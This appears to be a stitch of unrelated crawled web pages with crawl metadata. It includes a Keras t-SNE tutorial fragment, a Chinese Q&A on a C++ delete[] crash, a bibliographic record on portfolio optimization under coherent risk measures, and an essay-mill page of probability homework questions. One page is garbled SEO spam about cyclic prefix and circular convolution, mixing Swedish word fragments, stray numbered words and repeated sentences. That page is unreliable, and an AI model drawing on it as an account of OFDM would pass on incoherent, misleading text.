enumerate(model_truncated.layers):\nlayer.set_weights(model.layers[i].get_weights())\n\nmodel_truncated.compile(loss='categorical_crossentropy', optimizer=SGD(),\nmetrics=['accuracy'])\n\n# Check\nnp.all(model_truncated.layers.get_weights() == model.layers.get_weights())\n\nTrue\n\nhidden_features = model_truncated.predict(X_train)\n\nhidden_features.shape\n\n(45000, 512)\n\nX_train.shape\n\n(45000, 784)\n\n\n#### Hint: Alternative Method to get activations\n\n(Using keras.backend function on Tensors)\n\ndef get_activations(model, layer, X_batch):\nactivations_f = K.function([model.layers.input, K.learning_phase()], [layer.output,])\nactivations = activations_f((X_batch, False))\nreturn activations\n\n\n### Generate the Embedding of Hidden Features\n\nfrom sklearn.manifold import TSNE\n\ntsne = TSNE(n_components=2)\nX_tsne = tsne.fit_transform(hidden_features[:1000]) ## Reduced for computational issues\n\ncolors_map = np.argmax(Y_train, axis=1)\n\nX_tsne.shape\n\n(1000, 2)\n\nnb_classes\n\n10\n\nnp.where(colors_map==6)\n\n(array([ 1, 30, 62, 73, 86, 88, 89, 109, 112, 114, 123, 132, 134,\n137, 150, 165, 173, 175, 179, 215, 216, 217, 224, 235, 242, 248,\n250, 256, 282, 302, 303, 304, 332, 343, 352, 369, 386, 396, 397,\n434, 444, 456, 481, 493, 495, 496, 522, 524, 527, 544, 558, 571,\n595, 618, 625, 634, 646, 652, 657, 666, 672, 673, 676, 714, 720,\n727, 732, 737, 796, 812, 813, 824, 828, 837, 842, 848, 851, 
854,\n867, 869, 886, 894, 903, 931, 934, 941, 950, 956, 970, 972, 974, 988]),)\n\ncolors = np.array([x for x in 'b-g-r-c-m-y-k-purple-coral-lime'.split('-')])\ncolors_map = colors_map[:1000]\nplt.figure(figsize=(10,10))\nfor cl in range(nb_classes):\nindices = np.where(colors_map==cl)\nplt.scatter(X_tsne[indices,0], X_tsne[indices, 1], c=colors[cl], label=cl)\nplt.legend()\nplt.show()", null, "## Using Bokeh (Interactive Chart)\n\nfrom bokeh.plotting import figure, output_notebook, show\n\noutput_notebook()\n\n<div class=\"bk-root\">\n<a href=\"http://bokeh.pydata.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n</div>\n\np = figure(plot_width=600, plot_height=600)\n\ncolors = [x for x in 'blue-green-red-cyan-magenta-yellow-black-purple-coral-lime'.split('-')]\ncolors_map = colors_map[:1000]\nfor cl in range(nb_classes):\nindices = np.where(colors_map==cl)\np.circle(X_tsne[indices, 0].ravel(), X_tsne[indices, 1].ravel(), size=7,\ncolor=colors[cl], alpha=0.4, legend=str(cl))\n\n# show the results\np.legend.location = 'bottom_right'\nshow(p)\n\n<div class=\"bk-root\">\n<div class=\"bk-plotdiv\" id=\"e90df1a2-e577-49fb-89bb-6e083232c9ec\"></div>\n</div>\n\n\n## Exercise 1:\n\n### Try with a different algorithm to create the manifold\n\nfrom sklearn.manifold import MDS\n\n## Your code here\n\n\n## Exercise 2:\n\n### Try extracting the Hidden features of the First and the Last layer of the model\n\n## Your code here\n\n## Try using the get_activations function relying on keras backend\ndef get_activations(model, layer, X_batch):\nactivations_f = K.function([model.layers.input, K.learning_phase()], [layer.output,])\nactivations = activations_f((X_batch, False))\nreturn activations" ]
[ null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/mnist.png", null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/3.1 Hidden Layer Representation and Embeddings_16_1.png", null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/3.1 Hidden Layer Representation and Embeddings_18_1.png", null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/3.1 Hidden Layer Representation and Embeddings_23_0.png", null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/3.1 Hidden Layer Representation and Embeddings_23_1.png", null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/3.1 Hidden Layer Representation and Embeddings_36_1.png", null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/3.1 Hidden Layer Representation and Embeddings_36_2.png", null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/3.1 Hidden Layer Representation and Embeddings_60_0.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.54516375,"math_prob":0.92043704,"size":16430,"snap":"2019-51-2020-05","text_gpt3_token_len":4493,"char_repetition_ratio":0.15999027,"word_repetition_ratio":0.11305241,"special_character_ratio":0.36968958,"punctuation_ratio":0.23324573,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99170864,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,2,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-22T13:19:30Z\",\"WARC-Record-ID\":\"<urn:uuid:2341f69f-5143-4b4f-a637-7a93bee74dbb>\",\"Content-Length\":\"93939\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:174053c9-e767-4b0a-bf92-64996aee213e>\",\"WARC-Concurrent-To\":\"<urn:uuid:6f4117b6-a2c5-4ac4-b788-40558a4a8894>\",\"WARC-IP-Address\":\"107.170.1.165\",\"WARC-Target-URI\":\"https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/3.1%20Hidden%20Layer%20Representation%20and%20Embeddings.html\",\"WARC-Payload-Digest\":\"sha1:JDKH3NGCBNUOZ546COKDLF5M7HNNO65W\",\"WARC-Block-Digest\":\"sha1:WYRW2ZX3JQFV6QHNMA36EUU3IKDEYAPW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250607118.51_warc_CC-MAIN-20200122131612-20200122160612-00049.warc.gz\"}"}
https://ask.csdn.net/questions/368834
[ "", null, "2017-03-14 08:32\n\n# 内存删除出现问题,在delete[] 处程序运行中断,希望大家能帮我看一下问题出在哪里。", null, "`````` #define _CRT_SECURE_NO_WARNINGS\n#include <iostream>\n#include <iomanip>\n#include <math.h>\n#include <ctime>\n#include <Windows.h>\nusing namespace std;\n\nbool compare(const char *s, const char *q, int n)\n{\nint i = 0;\nwhile (i<n)\n{\nif (q[i++] != s[i++])\nreturn false;\n}\nif (i = n && (s[n] - ' ' == 0 || s[n] - '\\n' == 0 || s[n] == NULL))\nreturn true;\nelse\nreturn false;\n}\n\nint Triangle_num(char* fname)\n{\nFILE *fp;\nif ((fp = fopen(fname, \"r \")) == NULL)\n{\nprintf(\"Can't open file\");\nexit(1);\n}\n\nint npoint = 0; //点个数\nint count = 0; //三角面片个数\n\nwhile (!feof(fp)) //feof()函数为判断文件是否结束,C语言\n{\nchar f;\nfgets(f, 256, fp);\nif (compare(strtok(f, \" \"), \"vertex \", 6))\n{\nif (++npoint == 3)\n{\ncount++;\nnpoint = 0;\n}\n}\n}\nfclose(fp);\nreturn count;\n}\n\nvoid main()\n{\nchar *a, *b;\na = new char;\nb = new char;\na = \"C:\\\\Users\\\\Huan\\\\Desktop\\\\stl\\\\12workpiece.STL\";\nb = a;\nTriangle_num(a);\nsystem(\"pause\");\n\ndelete[] b;//增加delete之后出现报错\n}\n``````\n• 点赞\n• 写回答\n• 关注问题\n• 收藏\n• 复制链接分享\n• 邀请回答\n\n#### 2条回答\n\n• 用一段代码就知道问题在哪里了:\n\n`````` #include <stdio.h>\n\nint main(int argc, char **argv)\n{\nchar *a, *b;\na = new char;\nb = new char;\n\nprintf(\"a: %p b: %p\\n\", a, b);\na = \"C:\\\\Users\\\\Huan\\\\Desktop\\\\stl\\\\12workpiece.STL\";\nb = a;\nprintf(\"a: %p b: %p\\n\", a, b);\n\nreturn 0;\n}\n``````\n\n终端输出:\na: 0x80010288 b: 0x800102c0\na: 0x403070 b: 0x403070\n\nnew 了 a 和 b之后,这时 a地址是0x80010288 b地址是: 0x800102c0\n执行了a = \"C:\\Users\\Huan\\Desktop\\stl\\12workpiece.STL\";之后。a的地址又指向字符串所在的内存。\n你delete的时候,将会去释放字符串的内存,而这个内存是不用去释放的。真正需要释放的new出来的内存却没有释放,所以还有内存泄露的问题。\n\n点赞 1 评论 复制链接分享\n• `````` char *a, *b;\na = new char;\nb = new char;\nstrcpy(a,\"C:\\\\Users\\\\Huan\\\\Desktop\\\\stl\\\\12workpiece.STL\");\n\nb = a; // a 和 b 指向同一块区域\n//Triangle_num(a);\n//system(\"pause\");\n\ndelete a; 释放其中之一就可以\n``````\n点赞 1 评论 复制链接分享" ]
[ null, "https://profile.csdnimg.cn/4/6/E/4_cichaqiu4015", null, "https://img-ask.csdn.net/upload/201703/14/1489480300_178843.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.52136964,"math_prob":0.986258,"size":500,"snap":"2021-21-2021-25","text_gpt3_token_len":281,"char_repetition_ratio":0.098790325,"word_repetition_ratio":0.06896552,"special_character_ratio":0.422,"punctuation_ratio":0.26126125,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98125196,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-10T01:43:17Z\",\"WARC-Record-ID\":\"<urn:uuid:438086c0-86ab-45be-8cf5-1e81042660f9>\",\"Content-Length\":\"224117\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:755a008e-ea5d-47b7-8c1d-77e90dbc350e>\",\"WARC-Concurrent-To\":\"<urn:uuid:1c4496d7-ea30-4da7-abe6-1b3bef3c8567>\",\"WARC-IP-Address\":\"47.95.50.136\",\"WARC-Target-URI\":\"https://ask.csdn.net/questions/368834\",\"WARC-Payload-Digest\":\"sha1:ISZ2MVZFYGTEK76UCLB4YOMLWSCSIPVW\",\"WARC-Block-Digest\":\"sha1:BFGEMBEV2NKMJGRHN2567EZRPNF3A4LP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243989030.65_warc_CC-MAIN-20210510003422-20210510033422-00359.warc.gz\"}"}
https://skatterzngqs.netlify.app/34117/93241.html
[ "# Abkuerzungsverzeichnis_TK_IT\n\nSökresultat - DiVA\n\n24432. navigation 25129. prefix. 25130. wipe. Circular convolution, also known as cyclic convolution, is a special case of periodic convolution, which is the convolution of two periodic functions that have the same period.", null, "But the wireless channel does not perform circular convolution, it performs linear convolution. So the trick is to make this linear convolution appear as circular convolution by appending a cyclic prefix. The result is that equalization can be performed at the receiver by simple division. cyclic prefix N data [ ] [ ] ~ [ ] [ ] > @ [ ] [ ] 0 0 y n h k x n k h k x n k h n x n k N k ¦ P P – In a practical system, we can • 1. Add circular prefix to the data • 2.\n\n## TeleTrafic Probability Distribution Laplace Transform - Scribd\n\ndiktat 24431. circular. 24432.\n\n### hardie board shears harbor freight - KENT JANSSON UTVECKLING\n\nIt also allow some slop in the receiver's symbol clock. The L-point circular convolution of x1[n] and x2[n] is shown in OSB Figure 8.18(e), which can be formed by summing (b), (c), and (d) in the interval 0 ≤ n ≤ L − 1. Since the length of the linear convolution is (2L-1), the result of the 2L-point circular con­ volution in OSB Figure 8.18(f) is identical to the result of linear convolution.", null, "channel to  23 Aug 2019 Response (CIR) as a circular convolution during frequency domain equalization. Cyclic prefix is detached at the receiver, but its duration may  3 Aug 2020 In earlier work, we have shown that fast-convolution (FC) processing is a very transform (FFT)-based circular convolutions using partly overlapping 128 because this would lead to non-integer cyclic prefix (CP) lengt 14 Dec 2019 Copying the end of the payload and transmitting as the cyclic prefix ensures that there is a 'circular' convolution between the transmitted signal  Also the circular convolution can be applied between the OFDM signal and the channel response to model the transmission system. Figure 2.\nKöpa film uppsala", null, "cyclic prefix ofdm Hai, I am new to OFDMwas reading up a few articles on OFDM and came across cyclic prefix quite frequently..Can someone please explain what this is and why it is used..??\n\nSince the length of the linear convolution is (2L-1), the result of the 2L-point circular con­ volution in OSB Figure 8.18(f) is identical to the result of linear convolution. 2016-05-26 Circular Convolution: Key Properties 18 Consider an N-point signal x[n] Cyclic Prefix (CP) insertion: If x[n] is extended by copying the last samples of the symbols at the beginning of the symbol: Key Property 1: Key Property 2: , 0 1,1 x n n N xn x n N v n Of the cyclic prefix so addition of cyclic prefix of the Cyclic Prefix, so addition of Cyclic Prefix which is abbreviated as CP has resulted in a circular convolution at the output of adding a Cyclic Prefix.\nEu deklaration 2021", null, "lana pengar pa 5 minuter\na kassa metall regler\nhur många rötter har en kindtand\ngingipain inhibitor alzheimer\n\n### WikiExplorer/has_IW_link_to_EN_en.dat.csv at master · kamir\n\n“OFDM and SC-FDMA lectures” is published by EventHelix in LTE — Long Term Evolution. циклическая свёртка First, this paper presents an analysis of frequency-domain approaches to show that traditional circular-convolution based approaches cannot perfectly suppress   7 Nov 2020 convolution of the signal and channel to a circular convolution and. 
thereby causing the FFT of the circularly convolved signal and.\n\nHarris som ses i timmarna\nprototype en javascript\n\n### Matematisk ordbok för högskolan\n\nMatrix Method to Calculate Circular ConvolutionWatch more videos at https://www.tutorialspoint.com/videotutorials/index.htmLecture By: Ms. Gowthami Swarna, T CP is critically needed as it turns the linear convolution to circular convolution causing a much easier equalization technique in the frequency domain , how to determine the length of cyclic Thus by appending a cyclic prefix to the channel input the linear convolution from ELECTRICAL ECSE 493 at McGill University Well, the cylic prefix exists to combat ISI and the contents itself (tail of the symbol) lends itself to making the channel look like a circular convolution.So it really has a dual purpose, and my question is not the contents of the cylic prefix, but how its existence will remove ISI >Could anyone please explain how Cyclic Prefix in OFDM system converts >linear convolution to the circular convolution? Remember that the driving impairment is the channel impulse response, which has some length in time that is a significant portion of the OFDM symbol period. convolution of the signal and channel to a circular convolution and Cyclic prefix acts as a buffer region where delayed information from the previous symbols can get stored. Periodic or Circular ConvolutionWatch more videos at https://www.tutorialspoint.com/videotutorials/index.htmLecture By: Ms. Gowthami Swarna, Tutorials Point In the high-speed railway wireless communication, a joint channel estimation and signal detection algorithm is proposed for the orthogonal frequency division multiplexing (OFDM) system without cyclic prefix in the doubly-selective fading channels. Our proposed method first combines the basis expansion model (BEM) and the inter symbol interference 2020-11-17 · Unfortunately, linear convolution, not circular convolution, is a good model for the effects of wireless propagation per (5.87). It is possible to mimic the effects of circular convolution by modifying the transmitted signal with a suitably chosen guard interval." ]
[ null, "https://picsum.photos/800/600", null, "https://picsum.photos/800/613", null, "https://picsum.photos/800/640", null, "https://picsum.photos/800/638", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8241319,"math_prob":0.9510636,"size":5900,"snap":"2023-14-2023-23","text_gpt3_token_len":1401,"char_repetition_ratio":0.18012212,"word_repetition_ratio":0.08483563,"special_character_ratio":0.21491526,"punctuation_ratio":0.08574181,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97865975,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-21T03:52:41Z\",\"WARC-Record-ID\":\"<urn:uuid:8ffba199-bfd3-47ac-ab54-8052c724162a>\",\"Content-Length\":\"11565\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b4b086cc-9831-476f-b6b0-52ab57ba8a7c>\",\"WARC-Concurrent-To\":\"<urn:uuid:fabcd339-8758-4cbb-9ccc-a3c4de9f59aa>\",\"WARC-IP-Address\":\"35.231.210.182\",\"WARC-Target-URI\":\"https://skatterzngqs.netlify.app/34117/93241.html\",\"WARC-Payload-Digest\":\"sha1:2TLDNSNEMPLPOTXFAPCOFU362BSZOIYN\",\"WARC-Block-Digest\":\"sha1:MMFACXHNIFKF4ZKAD37MVEHPN4RIJWD5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296943625.81_warc_CC-MAIN-20230321033306-20230321063306-00267.warc.gz\"}"}
https://hungary.pure.elsevier.com/en/publications/instability-of-portfolio-optimization-under-coherent-risk-measure
[ "# Instability of portfolio optimization under coherent risk measures\n\nI. Kondor, István Varga-Haszonits\n\nResearch output: Contribution to journalArticle\n\n5 Citations (Scopus)\n\n### Abstract\n\nIt is shown that the axioms for coherent risk measures imply that whenever there is a pair of portfolios such that one of them dominates the other in a given sample (which happens with finite probability even for large samples), then there is no optimal portfolio under any coherent measure on that sample, and the risk measure diverges to minus infinity. This instability was first discovered in the special example of Expected Shortfall which is used here both as an illustration and as a springboard for generalization.\n\nOriginal language English 425-437 13 Advances in Complex Systems 13 3 https://doi.org/10.1142/S0219525910002591 Published - Jun 2010\n\n### Keywords\n\n• Coherent risk measures\n• estimation\n• expected shortfall\n• financial risk\n• portfolio optimization\n\n### ASJC Scopus subject areas\n\n• Control and Systems Engineering\n• General\n\n### Cite this\n\nInstability of portfolio optimization under coherent risk measures. / Kondor, I.; Varga-Haszonits, István.\n\nIn: Advances in Complex Systems, Vol. 13, No. 3, 06.2010, p. 425-437.\n\nResearch output: Contribution to journalArticle\n\nKondor, I. ; Varga-Haszonits, István. / Instability of portfolio optimization under coherent risk measures. In: Advances in Complex Systems. 2010 ; Vol. 13, No. 3. pp. 425-437.\n@article{ce3c1f1033b340f98edcfceb450808e4,\ntitle = \"Instability of portfolio optimization under coherent risk measures\",\nabstract = \"It is shown that the axioms for coherent risk measures imply that whenever there is a pair of portfolios such that one of them dominates the other in a given sample (which happens with finite probability even for large samples), then there is no optimal portfolio under any coherent measure on that sample, and the risk measure diverges to minus infinity. This instability was first discovered in the special example of Expected Shortfall which is used here both as an illustration and as a springboard for generalization.\",\nkeywords = \"Coherent risk measures, estimation, expected shortfall, financial risk, portfolio optimization\",\nauthor = \"I. Kondor and Istv{\\'a}n Varga-Haszonits\",\nyear = \"2010\",\nmonth = \"6\",\ndoi = \"10.1142/S0219525910002591\",\nlanguage = \"English\",\nvolume = \"13\",\npages = \"425--437\",\njournal = \"Advances in Complex Systems\",\nissn = \"0219-5259\",\npublisher = \"World Scientific Publishing Co. Pte Ltd\",\nnumber = \"3\",\n\n}\n\nTY - JOUR\n\nT1 - Instability of portfolio optimization under coherent risk measures\n\nAU - Kondor, I.\n\nAU - Varga-Haszonits, István\n\nPY - 2010/6\n\nY1 - 2010/6\n\nN2 - It is shown that the axioms for coherent risk measures imply that whenever there is a pair of portfolios such that one of them dominates the other in a given sample (which happens with finite probability even for large samples), then there is no optimal portfolio under any coherent measure on that sample, and the risk measure diverges to minus infinity. 
This instability was first discovered in the special example of Expected Shortfall which is used here both as an illustration and as a springboard for generalization.\n\nAB - It is shown that the axioms for coherent risk measures imply that whenever there is a pair of portfolios such that one of them dominates the other in a given sample (which happens with finite probability even for large samples), then there is no optimal portfolio under any coherent measure on that sample, and the risk measure diverges to minus infinity. This instability was first discovered in the special example of Expected Shortfall which is used here both as an illustration and as a springboard for generalization.\n\nKW - Coherent risk measures\n\nKW - estimation\n\nKW - expected shortfall\n\nKW - financial risk\n\nKW - portfolio optimization\n\nUR - http://www.scopus.com/inward/record.url?scp=77954596262&partnerID=8YFLogxK\n\nUR - http://www.scopus.com/inward/citedby.url?scp=77954596262&partnerID=8YFLogxK\n\nU2 - 10.1142/S0219525910002591\n\nDO - 10.1142/S0219525910002591\n\nM3 - Article\n\nAN - SCOPUS:77954596262\n\nVL - 13\n\nSP - 425\n\nEP - 437\n\nJO - Advances in Complex Systems\n\nJF - Advances in Complex Systems\n\nSN - 0219-5259\n\nIS - 3\n\nER -" ]
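The divergence described in the abstract is straightforward to reproduce numerically. Below is a minimal Python sketch (not taken from the paper; the return series, the sample size of 250, and the 30% tail level are invented purely for illustration): when one asset dominates another in every sample scenario, scaling up the long-minus-short position keeps lowering the historical Expected Shortfall, so the in-sample optimization has no finite minimizer.

```python
import numpy as np

def expected_shortfall(returns, alpha=0.3):
    """Historical Expected Shortfall: mean loss over the worst alpha fraction of scenarios."""
    losses = np.sort(-returns)[::-1]              # losses, largest first
    k = max(1, int(np.ceil(alpha * len(losses))))
    return losses[:k].mean()

rng = np.random.default_rng(0)
n = 250
r_b = rng.normal(0.0, 0.01, n)                    # asset B: baseline return scenarios
r_a = r_b + rng.uniform(0.001, 0.003, n)          # asset A dominates B in every scenario

for lam in (1, 10, 100, 1000):
    portfolio = lam * (r_a - r_b)                 # long A, short B, scaled up by lam
    print(lam, expected_shortfall(portfolio))     # ES keeps decreasing: no finite optimum
```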
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8762112,"math_prob":0.74747133,"size":2842,"snap":"2020-10-2020-16","text_gpt3_token_len":699,"char_repetition_ratio":0.1250881,"word_repetition_ratio":0.5833333,"special_character_ratio":0.252639,"punctuation_ratio":0.091836736,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.961598,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-21T14:02:54Z\",\"WARC-Record-ID\":\"<urn:uuid:f8ddcd8c-0ebf-4a8b-8b6a-184dce25de7d>\",\"Content-Length\":\"30486\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9cc612f1-d5e5-44a5-a33f-42f0560728b2>\",\"WARC-Concurrent-To\":\"<urn:uuid:dea1ca41-a90d-49de-8d95-9a30cad7548c>\",\"WARC-IP-Address\":\"52.209.51.54\",\"WARC-Target-URI\":\"https://hungary.pure.elsevier.com/en/publications/instability-of-portfolio-optimization-under-coherent-risk-measure\",\"WARC-Payload-Digest\":\"sha1:EFSK6X3MLO2R36C6NWTAO37LHML7YARN\",\"WARC-Block-Digest\":\"sha1:5LBKBMBSATLQZCQIJHKF4ZJWUJE25DQE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145529.37_warc_CC-MAIN-20200221111140-20200221141140-00141.warc.gz\"}"}
https://essaywritersexpert.com/assignment-week-3-exercise-course-math-201b2-summmer-2014/
[ "# Assignment: week 3 exercise course: math 201(b2) summmer 2014\n\nAssignment: Week 3 Exercise\n\nCourse: Math 201(B2) Summmer 2014\n\n1)      Determine which of the following nubers could not represent the probability of an event.\n\n0,0.025,-0.7,60%,660/1299.55/42\n\n2. Identify the sample space of the probability experiment and determine the number of outcomes in the sample space\n\nRandomly choosing a multiple of 3 between 1 and 20\n\n3. Determine the number of outcomes in the event. Decide weather the event is a simple event or not.\n\nYou randomly select one card from a standard deck. Event C is selecting a red ace.\n\n4. You randomly select one card from a standard deck. Event A is selecting a three. Determine the number of outcomes in event A. Then decide whether the event is a simple event or not.\n\nThe number of outcomes in the event A is —\n\nIs event A a simple event?\n\n5. Determine whether the statement is true or false. If it is false, rewrite it as a true statement.\n\nIf you roll a six sided die six times, you will roll an even number at least one.\n\n6. A random number generator is used to select a number from 1 to 100. What is the probability of selecting the number 123?\n\nChoose the correct probability below.\n\n7. Consider a company that selects employees for random drug tests. The company uses a computer to randomly select employees’ numbers that range from 1 to 5632. Find the probability of selecting a number less than 1000. Find the probability of selecting a number greater than 1000.\n\n8. A family has four children. Use the tree diagram to answer each question.\n\n9. You go to work for three days. Make an on-time/late tree diagram for the three days.\n\nChoose the correct tree diagram below.\n\n10. What is the probability that a registered voter voted in the election?\n\n11. Use the frequency distribution, which shows the responses of a survey of college students when asked “How often do you wear a seat belt when riding in a car driven by someone else?” Find the following probabilities of responses of college students from the survey chosen at random.\n\n12. Use the bar graph below, which shows the highest level of education received by employees of a company, to find the probability that the highest level of education for an employees chosen at random is B.\n\n13.  When two purple flowers (RB) are crossed, there are four equally likely possible outcomes for the genetic makeup of the offspring’s, red (RR), purple(RB) and blue(bb). If two purple snapdragons are crossed. What is the probability that the offspring will be (a) purple,(b) red and (c) blue?\n\n14. Determine whether the events E and F are independent or dependent. Justify your answer.\n\na)      E: A person having a high GPA\n\nF: The same person being highly organized.\n\nb)      E: A randomly selected person coloring her hair black.\n\nF: Another randomly selected person coloring her hair blond.\n\nc)       E: The war in a major oil-exporting country.\n\nF: The price of gasoline.\n\n15. Researcher found that people with depression are three times more likely to have a breathing related sleep disorder than people who are not depressed. Identify the two events described in the study. Do the results indicated that the events are independent or dependents?\n\nIdentify the two events. Choose the correct answer below.\n\nAre the event independent or depedent?\n\n16. In the general population, one woman in ten will develop breast cancer. 
Research has shown that 1 woman in 650 carries a mutation of the BRCA gene. Eight out of 10 women  with this mutation develop breast cancer.\n\na. Find the probability that a randomly selected woman will develop breast cancer given that she has a mutation of the BRCA gene.\n\nb. Find the probability that a randomly selected woman will carry the mutation of the BRCA gene and will develop breast cancer.\n\nc. Are the events of carrying this mutation and developing breast cancer independent or dependent?\n\n17. The table below shows the results of a survey in which 146 families were asked if they own a computer and if they will be taking a summer vacation this year.\n\nTable.\n\na)      Find the probability that a randomly selected family is not taking summer vacation this year.\n\nb)      Find the probability that a randomly selected family owns a computer\n\nc)       Find the probability a randomly selected family is taking a summer vacation this year given that they own a computer.\n\nd. Find the probability a randomly selected family is taking a summer vacation this year  and owns a computer.\n\ne). Are the events of owing a computer and taking a summer5 vacation this year independent or dependent events?\n\n18. Suppose 90% of kids who visits a doctor have a fever and 25% of kids with a fever have sore throats. What’s the probability that a kids who goes to the doctor has a fever and a sore throats.?\n\n19. The table below shows the result of a survey in which 141 men and 145 women workers ages 25 to 64 were asked if they have at least one month ‘s income set aside for emergencies.\n\nComplete parts (a) through (d)\n\nTabel:\n\n(a)    Find the probability that a randomly selected worker has one month’s income or more set aside for emergencies.\n\n(b)   Given that a randomly selected worker is a male, find the probability that the worker has less than one month’s income.\n\n(c)    Given that a randomly selected worker has one month’s income or more, , find the probability that the worker is a female.\n\n(d)   Are the events “having less than one month’s income saved “ and being male” independent or dependent?\n\n20.          About 19% of the population of a large country is hopelessly romantic. If two are randomly selected, what is the probability both are hopelessly romantic? What is the probability at least one is hopelessly romantic?\n\n21. A distribution center receives shipments of a products from three different factories in the quantities of 60, 40 and 20. Three times a product is selected at random, each time without replacement. Find the probability that (a) all three products come from the third factory and (b) none of the here products come from the third factory.\n\n22. By rewriting the formula for the multiplication rule, you can rewrite a formula for finding conditional probabilities. The conditional probability of event B occurring, given that event A has occurred, is P(B/ A) = P(A and B)/P(A). Use the information below to find the probability that  a  fight departed on time given that it arrives on time.\n\nThe probability that an airplane flight departs on time is 0.89.\n\nThe probability that a flight arrive on time is 0.87.\n\nThe probability that a flight departs and arrives on time is 0.82.\n\n23. Determine whether the statement is true or false. If it is false, rewrite it as a true statement.\n\nIt two events are mutually exclusive; they have no outcomes in common.\n\n24. 
Decide if the events shown in the venn  diagram are mutually exclusive.\n\nAre the events mutually exclusive?\n\n25. Decide if the events are mutually exclusive.\n\nEvent A: Randomly selecting someone who owns a car.\n\nEvent B: Randomly selecting a married male\n\nAre the two events mutually exclusive?\n\n26. During a 52- week period ,a company paid overtime wages for 19 weeks and hired temporary help for 9 weeks. During 5 weeks, the company paid overtime and hired temporary help.\n\nComplete parts(a) and (b) below.\n\n(a)    Are the event” selecting a week that contained overtime wages” and selecting a week that contained temporary help wages” mutually exclusive?\n\n(b)   If an auditor randomly examined the payroll records for only one week, what is the probability that the payroll for that week contained overtime wages or temporary help wages.\n\n27.          The percent distribution of live multiple- delivery births (three or more babies) in a particular year for women 15 to 54 years old shown in the pie chart. Find each probabilty.\n\nPie Chart ( number of multiple Birth)\n\na.       Randomly selecting a mother 30-39 years old.\n\nb.      Randomly selecting a mother not 30 -39 years old.\n\nc.       Randomly selcting a mother less than 45 years old.\n\nd.      Randomly selecting a mother at least 20 year old.\n\n28. Find P(A or B or C) for the given probabilities.\n\nP(A)=0.33, P(B)=0.23, P(C)=0.16\n\nP(A and B) = 0.13, P(A and C) =0.03, P(B and C) = 0.07\n\nP(A and B and C) = 0.01\n\n29. Decide if the situation invovles permutations, combinations, or neither. Explain your resonsing.\n\nThe number of ways a three – member committee can be chosen from 10 people.\n\nDoes the situation involve permutaion , combinations or neither ? choose the correct answer below.\n\n30. Space shuttle astronauts each consume an average of 3000 calories per day. One meal normally consists of a main dish, a vegetable dish and two different desserts. The astronauts can choose from 11 main dishes, 7 vegetable dishes and 12 desserts.  How many different meals are possible?\n\n31. Outside a home, there is an 8 –key keypad with letters A,B, C, D,E, F G & H that can be used to open the garage if the correct eight- letter code  is entered. Each key may be used only once. How many codes are possible.\n\n32. Suppose Grant is going to burn a compact disk (CD) that will contain 11 songs. In how many ways can grant arrange the 11 songs on the CD?", null, "" ]
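Two of the exercises above come with all the numbers needed to evaluate them, so a short worked check may be useful. The Python snippet below (not part of the original handout) applies the conditional-probability formula quoted in question 22 and the inclusion-exclusion rule from question 28:

```python
# Question 22: P(departed on time | arrived on time) = P(depart and arrive) / P(arrive)
p_depart_and_arrive = 0.82
p_arrive = 0.87
print(round(p_depart_and_arrive / p_arrive, 4))   # about 0.9425

# Question 28: P(A or B or C) by inclusion-exclusion
p_union = (0.33 + 0.23 + 0.16) - (0.13 + 0.03 + 0.07) + 0.01
print(round(p_union, 2))                          # 0.5
```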
[ null, "https://blueribbonwriters.com/wp-content/uploads/2020/01/order-supreme-essay.jpg", null ]
